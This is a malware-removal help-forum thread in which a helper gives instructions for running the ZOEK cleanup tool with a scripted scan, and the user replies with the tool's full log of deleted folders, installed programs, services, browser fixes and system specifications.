AdwCleaner[s1].txt - [6020 octets] - [25/10/2014 00:10:47]
AdwCleaner[s2].txt - [1216 octets] - [27/10/2014 14:54:49]

########## EOF - C:\AdwCleaner\AdwCleaner[s2].txt - [1276 octets] ##########

Naathim · October 27, 2014

OK, now the second round.

Scan with ZOEK

Please download ZOEK by Smeenk and save it to your desktop (preferred version is the *.exe one)

Temporary disable your AntiVirus and AntiSpyware protection - instructions here.

Right-click on icon and select Run as Administrator to start the tool.
Wait patiently until the main console will appear, it may take a minute or two.

In the main box please paste in the following script:

createsrpoint;autoclean;emptyfolderscheck;deleteprocess;services-list;systemspecs;startupall;skipfix-iedefaults;firefoxlook;chromelook;filesrcm;installedprogs;

Make sure that Scan All Users option is checked.
Push Run Script and wait patiently. The scan may take a couple of minutes.
When the scan completes, a zoek-results logfile should open in notepad.
If a reboot is needed, it will be opened after it. You may also find it at your main drive (usually C:\ drive)

Please include its content in your next reply.

Don't forget to re-enable your switched-off protection software!

bmclain · October 28, 2014

Zoek.exe v5.0.0.0 Updated 27-10-2014
Tool run by McLain on Mon 10/27/2014 at 16:23:16.68.
Microsoft Windows 7 Home Premium 6.1.7601 Service Pack 1 x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\McLain\Desktop\zoek.exe [scan all users] [script inserted]

==== System Restore Info ======================

10/27/2014 4:24:29 PM Zoek.exe System Restore Point Created Succesfully.

==== Empty Folders Check ======================

C:\PROGRA~2\Amazon deleted successfully
C:\PROGRA~2\Backyard Productions deleted successfully
C:\PROGRA~2\Mp3tag deleted successfully
C:\PROGRA~2\WinCDEmu deleted successfully
C:\PROGRA~2\COMMON~1\Nero deleted successfully
C:\Program Files\bin deleted successfully
C:\PROGRA~3\EBI deleted successfully
C:\PROGRA~3\eMule deleted successfully
C:\PROGRA~3\Malwarebytes' Anti-Malware (portable) deleted successfully
C:\PROGRA~3\OEM Links deleted successfully
C:\PROGRA~3\Oracle deleted successfully
C:\PROGRA~3\RSMR deleted successfully
C:\Users\McLain\AppData\Roaming\Amazon deleted successfully
C:\Users\McLain\AppData\Roaming\DVD Flick deleted successfully
C:\Users\McLain\AppData\Roaming\FileAdvisor deleted successfully
C:\Users\McLain\AppData\Roaming\Oxihn deleted successfully
C:\Users\McLain\AppData\Roaming\Philipp Winterberg deleted successfully
C:\Users\McLain\AppData\Roaming\Tamy deleted successfully
C:\Users\McLain\AppData\Roaming\TP deleted successfully
C:\Users\McLain\AppData\Roaming\uTorrent deleted successfully
C:\Users\McLain\AppData\Roaming\WinPatrol deleted successfully
C:\Users\McLain\AppData\Local\Avg2013 deleted successfully
C:\Users\McLain\AppData\Local\cache deleted successfully
C:\Users\McLain\AppData\Local\PACE Anti-Piracy deleted successfully

==== Deleting CLSID Registry Keys ======================

==== Deleting CLSID Registry Values ======================

==== Installed Programs ======================

64 Bit HP CIO Components Installer
Adobe AIR
Adobe Flash Player 15 ActiveX
Adobe Flash Player 15 Plugin
Adobe Help Manager
Adobe Reader XI (11.0.09)
AGEIA PhysX v6.10.25
AI Manager
AMD USB Filter Driver
ASUS Backup Wizard
ASUS PCE-N10 WLAN Card Utilities & Driver
ASUS PCE-N53 WLAN Card Utilities & Driver
ASUS VIBE
ASUSUpdate
ATI Catalyst Install Manager
Avira
Avira Free Antivirus
Best Buy pc app
bl
Brother HL-2040
Catalyst Control Center Core Implementation
Catalyst Control Center Graphics Full Existing
Catalyst Control Center Graphics Full New
Catalyst Control Center Graphics Light
Catalyst Control Center Graphics Previews Common
Catalyst Control Center Graphics Previews Vista
Catalyst Control Center InstallProxy
Catalyst Control Center Localization All
ccc-core-static
ccc-utility64
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
CCleaner
CDisplayEx 1.10.29
Cisco EAP-FAST Module
Cisco LEAP Module
Cisco PEAP Module
D3DX10
DjVuLibre DjView 3.5.25.4+4.9.2
Google Earth
Google Update Helper
ImagXpress
LogixPro-500 PLC Simulator
Malwarebytes Anti-Malware version 2.0.3.1025
Microsoft .NET Framework 4.5.1
Microsoft Application Error Reporting
Microsoft Office 2010
Microsoft Office Click-to-Run 2010
Microsoft Office Starter 2010 - English
Microsoft PowerPoint Viewer
Microsoft Silverlight
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2005 Redistributable (x64)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
Microsoft_VC80_ATL_x86
Microsoft_VC80_CRT_x86
Microsoft_VC80_CRT_x86_x64
Microsoft_VC80_MFC_x86
Microsoft_VC80_MFC_x86_x64
Microsoft_VC80_MFCLOC_x86
Microsoft_VC80_MFCLOC_x86_x64
Microsoft_VC90_ATL_x86
Microsoft_VC90_ATL_x86_x64
Microsoft_VC90_CRT_x86
Microsoft_VC90_CRT_x86_x64
Microsoft_VC90_MFC_x86
Microsoft_VC90_MFC_x86_x64
Microsoft_VC90_MFCLOC_x86
Movie Maker
Mozilla Firefox 33.0 (x86 en-US)
Mozilla Maintenance Service
MSVCRT
MSVCRT110
MSVCRT110_amd64
MSXML 4.0 SP2 (KB973688)
MSXML 4.0 SP3 Parser (KB2721691)
MSXML 4.0 SP3 Parser (KB2758694)
MSXML 4.0 SP3 Parser (KB973685)
neroxml
ph
Photo Common
Photo Gallery
Platform
PxMergeModule
QuickTime 7
RangeMax Wireless-N USB Adapter WN111v2
Readiris Pro 10
Realtek Ethernet Controller Driver
Sansa Updater
Security Update for Microsoft .NET Framework 4.5.1 (KB2894854v2)
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)
Security Update for Microsoft .NET Framework 4.5.1 (KB2931368)
Security Update for Microsoft .NET Framework 4.5.1 (KB2972107)
Security Update for Microsoft .NET Framework 4.5.1 (KB2972216)
Security Update for Microsoft .NET Framework 4.5.1 (KB2979578v2)
Skype Click to Call
SkypeT 6.18
Steam
swMSM
VIA Platform Device Manager
VLC media player
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Photo Common
Windows Live PIMT Platform
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
WinRAR 5.11 (64-bit)
Ys Origin

==== Running Processes ======================

C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\ASUSService.exe
C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
C:\Program Files (x86)\Avira\My Avira\Avira.OE.ServiceHost.exe
C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
C:\Program Files (x86)\Avira\My Avira\Avira.OE.Systray.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
C:\Users\McLain\Desktop\zoek.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe

==== Services (whitelist) ======================
Powered by E Dev

R2 - [AdobeARMservice] - Adobe Acrobat Update Service - "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
R2 - [AntiVirSchedulerService] - Avira Scheduler - "C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe"
R2 - [AntiVirService] - Avira Real-Time Protection - "C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe"
R2 - [ASUSWireless] - ASUSWireless - "C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\ASUSService.exe"
R2 - [Avira.OE.ServiceHost] - Avira Service Host - "C:\Program Files (x86)\Avira\My Avira\Avira.OE.ServiceHost.exe"
R2 - [c2cautoupdatesvc] - Skype Click to Call Updater - "C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe" /service
R2 - [c2cpnrsvc] - Skype Click to Call PNR Service - "C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe" /service
R2 - [cvhsvc] - Client Virtualization Handler - "C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE"
R2 - [sftlist] - Application Virtualization Client - "C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe"
R2 - [wlidsvc] - Windows Live ID Sign-in Assistant - "C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE"
R2 - [WMPNetworkSvc] - Windows Media Player Network Sharing Service - "C:\Program Files\Windows Media Player\wmpnetwk.exe"
R2 - [WSearch] - Windows Search - C:\Windows\system32\SearchIndexer.exe /Embedding
R3 - [sftvsa] - Application Virtualization Service Agent - "C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe"
S2 - [clr_optimization_v4.0.30319_32] - Microsoft .NET Framework NGEN v4.0.30319_X86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
S2 - [clr_optimization_v4.0.30319_64] - Microsoft .NET Framework NGEN v4.0.30319_X64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
S2 - [gupdate] - Google Update Service (gupdate) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
S2 - [skypeUpdate] - Skype Updater - "C:\Program Files (x86)\Skype\Updater\Updater.exe"
S2 - [sppsvc] - Software Protection - C:\Windows\system32\sppsvc.exe
S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash Player Update Service - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
S3 - [ALG] - Application Layer Gateway Service - C:\Windows\System32\alg.exe
S3 - [COMSysApp] - COM+ System Application - C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
S3 - [ehRecvr] - Windows Media Center Receiver Service - C:\Windows\ehome\ehRecvr.exe
S3 - [ehSched] - Windows Media Center Scheduler Service - C:\Windows\ehome\ehsched.exe
S3 - [Fax] - Fax - C:\Windows\system32\fxssvc.exe
S3 - [FontCache3.0.0.0] - Windows Presentation Foundation Font Cache 3.0.0.0 - C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
S3 - [gupdatem] - Google Update Service (gupdatem) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
S3 - [iEEtwCollectorService] - Internet Explorer ETW Collector Service - C:\Windows\system32\IEEtwCollector.exe /V
S3 - [MozillaMaintenance] - Mozilla Maintenance Service - "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
S3 - [MSDTC] - Distributed Transaction Coordinator - C:\Windows\System32\msdtc.exe
S3 - [msiserver] - Windows Installer - C:\Windows\system32\msiexec.exe /V
S3 - [ose] - Office Source Engine - "C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
S3 - [osppsvc] - Office Software Protection Platform - "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
S3 - [PerfHost] - Performance Counter DLL Host - C:\Windows\SysWow64\perfhost.exe
S3 - [RpcLocator] - Remote Procedure Call (RPC) Locator - C:\Windows\system32\locator.exe
S3 - [sNMPTRAP] - SNMP Trap - C:\Windows\System32\snmptrap.exe
S3 - [TrustedInstaller] - Windows Modules Installer - C:\Windows\servicing\TrustedInstaller.exe
S3 - [vds] - Virtual Disk - C:\Windows\System32\vds.exe
S3 - [VSS] - Volume Shadow Copy - C:\Windows\system32\vssvc.exe
S3 - [WatAdminSvc] - Windows Activation Technologies Service - C:\Windows\system32\Wat\WatAdminSvc.exe
S3 - [wbengine] - Block Level Backup Engine Service - "C:\Windows\system32\wbengine.exe"
S3 - [wmiApSrv] - WMI Performance Adapter - C:\Windows\system32\wbem\WmiApSrv.exe
S4 - [AMD External Events Utility] - AMD External Events Utility - C:\Windows\system32\atiesrxx.exe
S4 - [aspnet_state] - ASP.NET State Service - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
S4 - [clr_optimization_v2.0.50727_32] - Microsoft .NET Framework NGEN v2.0.50727_X86 - C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
S4 - [clr_optimization_v2.0.50727_64] - Microsoft .NET Framework NGEN v2.0.50727_X64 - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
S4 - [Device Handle Service] - Device Handle Service - C:\Windows\SysWOW64\AsHookDevice.exe
S4 - [jswpsapi] - Jumpstart Wifi Protected Setup - C:\Program Files (x86)\NETGEAR\WN111v2\jswpsapi.exe
S4 - [RalinkRegistryWriter] - Ralink Registry Writer - "C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\RaRegistry.exe"
S4 - [steam Client Service] - Steam Client Service - "C:\Program Files (x86)\Common Files\Steam\SteamService.exe" /RunAsService

==== Deleting Services ======================

==== FireFox Fix ======================

ProfilePath: C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101

user.js not found
---- Lines search.com removed from prefs.js ----
user_pref("capability.policy.maonoscript.sites", "addons.mozilla.org addthis.com afx.ms ajax.aspnetcdn.com amazon.com barnesandnoble.com belkin.com be
---- Lines blekko removed from prefs.js ----
user_pref("browser.uiCustomization.state", "{\"placements\":{\"PanelUI-contents\":[\"edit-controls\",\"zoom-controls\",\"new-window-button\",\"private
---- FireFox user.js and prefs.js backups ----

prefs_20141027_0433_.backup

ProfilePath: C:\Users\McLain\AppData\Roaming\Thunderbird\Profiles\thp642th.default

user.js not found
---- FireFox user.js and prefs.js backups ----

prefs_20141027_0433_.backup

ProfilePath: C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\89DJTSUD.default

prefs.js not found
user.js not found
---- FireFox user.js and prefs.js backups ----

==== Deleting Files \ Folders ======================

C:\PROGRA~3\Malwarebytes' Anti-Malware (portable) not found
C:\Users\McLain\.android deleted
C:\PROGRA~2\Mozilla Firefox\defaults\preferences\autoconfig.js deleted
C:\Users\McLain\AppData\Roaming\ndtub.dll deleted
C:\Users\McLain\AppData\Roaming\psrsca.dll deleted
C:\PROGRA~3\Package Cache deleted
C:\Users\McLain\AppData\Local\newhb.crx deleted
C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\jetpack deleted
C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\CT3310511 deleted
C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\89DJTSUD.default\extensions\abs@avira.com deleted
"C:\ProgramData\.811261211181235583101118113995" deleted
"C:\Users\McLain\AppData\Roaming\Inyr\dyab.eha" deleted
"C:\Users\McLain\AppData\Roaming\Inyr\dyab.tmp" deleted
"C:\Users\McLain\AppData\Roaming\Xoru\saowz.rey" deleted
"C:\Users\McLain\AppData\Roaming\enchant\en_US.dic" deleted
"C:\Users\McLain\AppData\Roaming\enchant\en_US.exc" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftcomp.dll" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftcore.dll" not deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftevent.dll" not deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftfsi_wow64.dll" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftintf.dll" not deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftlist.exe" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftpsr.dll" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftsync.dll" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftuser.dll" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftvsa.exe" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftcomp.dll" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftcore.dll" not deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftevent.dll" not deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftfsi_wow64.dll" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftintf.dll" not deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftlist.exe" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftpsr.dll" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftsync.dll" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftuser.dll" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client\sftvsa.exe" deleted
"C:\Users\McLain\AppData\Roaming\Inyr" deleted
"C:\Users\McLain\AppData\Roaming\Xoru" deleted
"C:\Users\McLain\AppData\Roaming\enchant" deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client" not deleted
"C:\PROGRA~2\Microsoft Application Virtualization Client" not deleted
"C:\PROGRA~2\Windows Portable Devices" deleted

==== System Specs ======================

Windows: Windows 7 Home Premium Edition (64-bit) Service Pack 1 (Build 7601)
Memory (RAM): 5888 MB
CPU Info: AMD Phenom II X4 830 Processor
CPU Speed: 2849.7 MHz
Sound Card: Speakers (VIA High Definition A |
HD Audio HDMI out (VIA High Def |
SPDIF Interface (TX1) (VIA High |
Display Adapters: ATI Radeon 3000 Graphics | ATI Radeon 3000 Graphics | RDPDD Chained DD | RDP Encoder Mirror Driver | RDP Reflector Display Driver
Monitors: 1x; Generic PnP Monitor |
Screen Resolution: 1360 X 768 - 32 bit
Network: Network Present
Network Adapters: Realtek PCIe GBE Family Controller
CD / DVD Drives: 1x (D: | ) D: ATAPI   DVD A DH16ABSH
Ports: COM Ports NOT Present. LPT Port NOT Present.
Mouse: 16 Button Wheel Mouse Present
Hard Disks: C: 917.3GB | Q: 0.0MB
Hard Disks - Free: C: 162.3GB | Q: 0.0MB
Manufacturer *: American Megatrends Inc.
BIOS Info: AT/AT COMPATIBLE | 01/07/11 | _ASUS_ - 20110107
Time Zone: Pacific Standard Time
Motherboard *: ASUSTeK Computer INC. CM1630
Country: United States
Language: ENU

==== System Specs (Software) ======================

Anti-Virus: Avira Desktop On-access scanning disabled (Outdated)
Anti-Spyware: Avira Desktop disabled (Outdated)
Anti-Spyware: Windows Defender disabled (Outdated)
Default Browser: Firefox   33.0
Internet Explorer Version: 11.0.9600.17358
Mozilla Firefox version: 33.0 (x86 en-US)
Adobe Reader version: 11.0.9.29
Flash Player version: 15.0.0.189

==== Files Recently Created / Modified ======================

====== C:\Windows ====
2014-10-21 05:25:37   F042EE4C8D66248D9B86DCF52ABAE416   256000   ----a-w-   C:\Windows\PEV.exe
2014-10-21 05:25:37   9E05A9C264C8A908A8E79450FCBFF047   80412   ----a-w-   C:\Windows\grep.exe
2014-10-21 05:25:37   5E832F4FAF5F481F2EAF3B3A48F603B8   68096   ----a-w-   C:\Windows\zip.exe
2014-10-21 05:25:37   0297C72529807322B152F517FDB0A9FC   406528   ----a-w-   C:\Windows\SWSC.exe
2014-10-21 05:25:37   0277C027A26428DB64EF4F64F52BB4FD   208896   ----a-w-   C:\Windows\MBR.exe
====== C:\Users\McLain\AppData\Local\Temp ====
2014-10-27 21:36:08   E0DC8C6BBC787B972A9A468648DBFD85   1008128   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\libiconv2.dll
2014-10-27 21:36:08   D202BAA425176287017FFE1FB5D1B77C   103424   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\libintl3.dll
2014-10-27 21:36:08   57CAC848FA14AE38F14F9441F8933282   140288   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\pcre3.dll
2014-10-27 21:36:08   547C43567AB8C08EB30F6C6BACB479A3   79360   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\regex2.dll
2014-10-27 21:36:08   2E0323A94915FAAB10A25F3BABF82584   157696   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\erunt\ERUNT.EXE
2014-10-27 14:07:41   591E40557E9A67C7E459193ACFC28366   53496   ----a-w-   C:\Users\McLain\AppData\Local\Temp\avgnt.exe\Avira.OE.ExtApi.dll
2014-10-19 20:58:16   5C73E64374D9BA37AC5569D1F7DE5C9B   665682   ----a-w-   C:\Users\McLain\AppData\Local\Temp\sqlite3.dll
====== Java Cache =====
====== C:\Windows\SysWOW64 =====
2014-10-25 08:47:14   1FD3F9722119BDF7B8CFF0ECD1E84EA6   1060864   ----a-w-   C:\Windows\SysWOW64\mfc71.dll
2014-10-25 08:47:13   D0AAAE16BA162DD89D646887F1539855   1700352   ----a-w-   C:\Windows\SysWOW64\gdiplus.dll
2014-10-24 10:42:37   0C9988BDA3CEC3C421B773982C5E2EC6   5703168   ----a-w-   C:\Windows\SysWOW64\mstscax.dll
2014-10-24 07:06:06   AB5EFB103DB01C1912C9D2F545EA5621   17920   ----a-w-   C:\Windows\SysWOW64\wksprtPS.dll
2014-10-24 07:06:06   8DEEE20D8D30E9B0FBDCA31E58A027BD   53248   ----a-w-   C:\Windows\SysWOW64\tsgqec.dll
2014-10-24 07:06:06   4676AAA9DDF52A50C829FEDB4EA81E54   1068544   ----a-w-   C:\Windows\SysWOW64\mstsc.exe
2014-10-24 07:06:06   2EFB1279E7BEA7D12D9F4D6508D27880   50176   ----a-w-   C:\Windows\SysWOW64\MsRdpWebAccess.dll
2014-10-24 07:06:05   5E676B296B762E211D83B87635F2C330   855552   ----a-w-   C:\Windows\SysWOW64\rdvidcrl.dll
2014-10-24 07:03:25   AD27563BC16AB1EAACAE3033E99C2F78   194048   ----a-w-   C:\Windows\SysWOW64\elshyph.dll
2014-10-24 07:03:22   FBE852643EDEB9D6D6502AFE6017CD64   678400   ----a-w-   C:\Windows\SysWOW64\ieapfltr.dll
2014-10-24 07:03:22   F91E55DA404B834648A3B0A2477C10DB   17484800   ----a-w-   C:\Windows\SysWOW64\mshtml.dll
2014-10-24 07:03:22   F862CD08F1AD4EE39BD506853F3C6103   16284   ----a-w-   C:\Windows\SysWOW64\ieuinit.inf
2014-10-24 07:03:22   F7B6E341F4B1947BEC0E14EEBE3C627E   111616   ----a-w-   C:\Windows\SysWOW64\IEAdvpack.dll
2014-10-24 07:03:22   EF94FA1F3D90520CCA4AE65D639A9E62   11807232   ----a-w-   C:\Windows\SysWOW64\ieframe.dll
2014-10-24 07:03:22   EC7038154490E50ACD405A022F51B204   83456   ----a-w-   C:\Windows\SysWOW64\inseng.dll
2014-10-24 07:03:22   DF59F2510EDABBF216FA837D5D964106   51200   ----a-w-   C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-24 07:03:22   DF4BA130BD41F29A894E026E456B8481   454656   ----a-w-   C:\Windows\SysWOW64\vbscript.dll
2014-10-24 07:03:22   D9F12F54E3B5A092F1D5F191F5286E53   337408   ----a-w-   C:\Windows\SysWOW64\html.iec
2014-10-24 07:03:22   D78C4DB153874DB7AC6AA6A03BE38B66   331448   ----a-w-   C:\Windows\SysWOW64\iedkcs32.dll
2014-10-24 07:03:22   D03EB7605435FE24ADE670661A932651   4201472   ----a-w-   C:\Windows\SysWOW64\jscript9.dll
2014-10-24 07:03:22   CFCE4EFF1D6D909EE2EA3AFCB8F1E677   233472   ----a-w-   C:\Windows\SysWOW64\url.dll
2014-10-24 07:03:22   C1A6E565B2782C09BC40AD749B46D9ED   71680   ----a-w-   C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2014-10-24 07:03:22   C17139EAF939964142C7A1AEEE02DC81   616104   ----a-w-   C:\Windows\SysWOW64\ieapfltr.dat
2014-10-24 07:03:22   BD66BA5A924DCC8392CFAEB67131A246   597504   ----a-w-   C:\Windows\SysWOW64\jscript9diag.dll
2014-10-24 07:03:22   B89F5D2B3D3BC730FAB93CFCD931742F   607744   ----a-w-   C:\Windows\SysWOW64\msfeeds.dll
2014-10-24 07:03:22   B74B348D13134D67B4F68ADDDC76A447   43008   ----a-w-   C:\Windows\SysWOW64\jsproxy.dll
2014-10-24 07:03:22   B5B1C277E46A5B0E2FC63E5FC5624CE5   365056   ----a-w-   C:\Windows\SysWOW64\dxtmsft.dll
2014-10-24 07:03:22   AE6A2C5ECD3E96556E22F12816842F60   48640   ----a-w-   C:\Windows\SysWOW64\mshtmler.dll
2014-10-24 07:03:22   ABDFC692D9FE43E2BA8FE6CB5A8CB95A   13312   ----a-w-   C:\Windows\SysWOW64\mshta.exe
2014-10-24 07:03:22   AB3B2CA52AFB695AFCDD2620A21E5B21   24576   ----a-w-   C:\Windows\SysWOW64\licmgr10.dll
2014-10-24 07:03:22   AA103FEAD721863B86A1B1260948E662   112128   ----a-w-   C:\Windows\SysWOW64\ieUnatt.exe
2014-10-24 07:03:22   9E170B0AF156B478BD2B1FD6A2250C9E   62464   ----a-w-   C:\Windows\SysWOW64\tdc.ocx
2014-10-24 07:03:22   9B8701A380CEE1B05D651B4ED4048C8F   645120   ----a-w-   C:\Windows\SysWOW64\jsIntl.dll
2014-10-24 07:03:22   9A33FDDD687A836A1FD478B43C5A95FD   151552   ----a-w-   C:\Windows\SysWOW64\iexpress.exe
2014-10-24 07:03:22   97F2F82BF0B4AF86A85FFDD78DFDC87D   60416   ----a-w-   C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-24 07:03:22   8FAA1E45198C4ECEC691326B7F5E71C5   61952   ----a-w-   C:\Windows\SysWOW64\iesetup.dll
2014-10-24 07:03:22   8E8E6E7B4CC27B92F40F74E29C1F6290   1068032   ----a-w-   C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-24 07:03:22   887055A3C8DD6C87D200D11EAFDBD45B   74240   ----a-w-   C:\Windows\SysWOW64\SetIEInstalledDate.exe
2014-10-24 07:03:22   83F49FD1BC0A999B006D564C540C7258   86016   ----a-w-   C:\Windows\SysWOW64\iesysprep.dll
2014-10-24 07:03:22   835807E2AC0A8FA15B9A2EA80E2D5169   2017280   ----a-w-   C:\Windows\SysWOW64\inetcpl.cpl
2014-10-24 07:03:22   7AE80F921027CF88CB9D0433088A3E55   1810944   ----a-w-   C:\Windows\SysWOW64\wininet.dll
2014-10-24 07:03:22   779E142FE2159935E78C0FA2E190FF1E   610304   ----a-w-   C:\Windows\SysWOW64\jscript.dll
2014-10-24 07:03:22   6EB0B7301E00F717BD68A742D1391FAF   36352   ----a-w-   C:\Windows\SysWOW64\imgutil.dll
2014-10-24 07:03:22   6D4DD5706C297234F457B9D9018C493F   61952   ----a-w-   C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-24 07:03:22   6A92CEC8532056791C6832B2725D170D   139264   ----a-w-   C:\Windows\SysWOW64\wextract.exe
2014-10-24 07:03:22   604C67F58747D6A333EA641BCCC2C842   32768   ----a-w-   C:\Windows\SysWOW64\iernonce.dll
2014-10-24 07:03:22   58EC068116BCE16A94B1B2C429A35E41   2724864   ----a-w-   C:\Windows\SysWOW64\mshtml.tlb
2014-10-24 07:03:22   55A400FDB21D157E947A0EE65AEDB1B3   2187264   ----a-w-   C:\Windows\SysWOW64\iertutil.dll
2014-10-24 07:03:22   55969AADF0210A614700F89B48976F68   43008   ----a-w-   C:\Windows\SysWOW64\msfeedsbs.dll
2014-10-24 07:03:22   53FC62C51CB18C9100A7DFAF2D2A6C47   12800   ----a-w-   C:\Windows\SysWOW64\msfeedssync.exe
2014-10-24 07:03:22   4F032F1FDEFEA5EC8EEA3562643B5EE8   69120   ----a-w-   C:\Windows\SysWOW64\icardie.dll
2014-10-24 07:03:22   4BCC7EB5F20840DA67943BD86AE95735   56832   ----a-w-   C:\Windows\SysWOW64\pngfilt.dll
2014-10-24 07:03:22   410BECCA3354D471E45344F0754CC0E4   243200   ----a-w-   C:\Windows\SysWOW64\dxtrans.dll
2014-10-24 07:03:22   3065FF6794A7FDC882F0DA8B6230AB6E   1190400   ----a-w-   C:\Windows\SysWOW64\urlmon.dll
2014-10-24 07:03:22   298FDE634538B62CEEEC266D8773B21A   182272   ----a-w-   C:\Windows\SysWOW64\msls31.dll
2014-10-24 07:03:22   2409C41081D657A3FABE3659BB989AFB   164864   ----a-w-   C:\Windows\SysWOW64\msrating.dll
2014-10-24 07:03:22   201EAFA3F17BE4990999C28657212D8E   69632   ----a-w-   C:\Windows\SysWOW64\mshtmled.dll
2014-10-24 07:03:22   1AFBAA54BDF637F69B8E02A5578286B0   116736   ----a-w-   C:\Windows\SysWOW64\iepeers.dll
2014-10-24 07:03:22   158690737381C49120165A7F3F5D13EB   440320   ----a-w-   C:\Windows\SysWOW64\ieui.dll
